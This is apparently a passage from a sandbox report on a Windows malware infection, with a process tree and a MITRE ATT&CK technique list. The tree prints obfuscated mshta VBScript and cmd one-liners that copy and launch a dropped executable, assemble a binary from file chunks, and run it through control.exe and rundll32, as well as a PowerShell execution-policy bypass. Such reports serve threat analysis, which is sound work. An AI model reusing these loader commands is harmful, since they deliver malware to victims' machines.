        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2564 /prefetch:1
        9⤵
        
        PID:9092
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2572 /prefetch:1
        9⤵
        
        PID:6304
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3200 /prefetch:2
        9⤵
        
        PID:5436
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=1892 /prefetch:8
        9⤵
        
        PID:7740
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=3284 /prefetch:8
        9⤵
        
        PID:6116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1256
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe
        
        Mon203f01ac7e6.exe
        5⤵
        
        PID:1748
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        6⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe") do taskkill /F -Im "%~NxU"
        7⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\09xU.exE
        
        09xU.EXE -pPtzyIkqLZoCarb5ew
        8⤵
        
        PID:1108
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        9⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
        10⤵
        
        PID:4204
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
        9⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
        10⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
        11⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
        11⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\control.exe
        
        control .\R6f7sE.I
        11⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
        12⤵
        
        PID:1352
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
        13⤵
        
        PID:8088
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
        14⤵
        
        PID:8156
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F -Im "Mon203f01ac7e6.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe
      4⤵
      PID:4032
    - - C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20b6f9d5bd03a305.exe
        
        Mon20b6f9d5bd03a305.exe
        5⤵
        Executes dropped EXE
        
        PID:4008

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:4916

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
1⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\7DD2.exe
C:\Users\Admin\AppData\Local\Temp\7DD2.exe
1⤵
PID:5104

C:\Users\Admin\AppData\Roaming\eaieagr
C:\Users\Admin\AppData\Roaming\eaieagr
1⤵
PID:7008

C:\Users\Admin\AppData\Roaming\buieagr
C:\Users\Admin\AppData\Roaming\buieagr
1⤵
PID:208

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20211012-2029.dm
1⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\A82B.exe
C:\Users\Admin\AppData\Local\Temp\A82B.exe
1⤵
PID:8068

C:\Users\Admin\AppData\Local\Temp\BC51.exe
C:\Users\Admin\AppData\Local\Temp\BC51.exe
1⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\CFDA.exe
C:\Users\Admin\AppData\Local\Temp\CFDA.exe
1⤵
PID:4764

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
1⤵
PID:3680

C:\Users\Admin\AppData\Local\Temp\E576.exe
C:\Users\Admin\AppData\Local\Temp\E576.exe
1⤵
PID:2724

C:\Users\Admin\AppData\Local\Temp\1263.exe
C:\Users\Admin\AppData\Local\Temp\1263.exe
1⤵
PID:8532
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  PID:8336
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1ov2qtki\1ov2qtki.cmdline"
    3⤵
    PID:7220
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37C3.tmp" "c:\Users\Admin\AppData\Local\Temp\1ov2qtki\CSC875741AAF4484803AE6A49F3E56129.TMP"
      4⤵
      PID:5112
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:7056

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8608

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8844

C:\Users\Admin\AppData\Local\Temp\25DC.exe
C:\Users\Admin\AppData\Local\Temp\25DC.exe
1⤵
PID:8908
- C:\Users\Admin\AppData\Local\Temp\25DC.exe
  C:\Users\Admin\AppData\Local\Temp\25DC.exe
  2⤵
  PID:8312

C:\Users\Admin\AppData\Local\Temp\5A7A.exe
C:\Users\Admin\AppData\Local\Temp\5A7A.exe
1⤵
PID:6656

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:8956
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6DE1AC387A682772E052D8F0E0558708 C
  2⤵
  PID:9124

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5740
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1004

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8664
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:9108

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery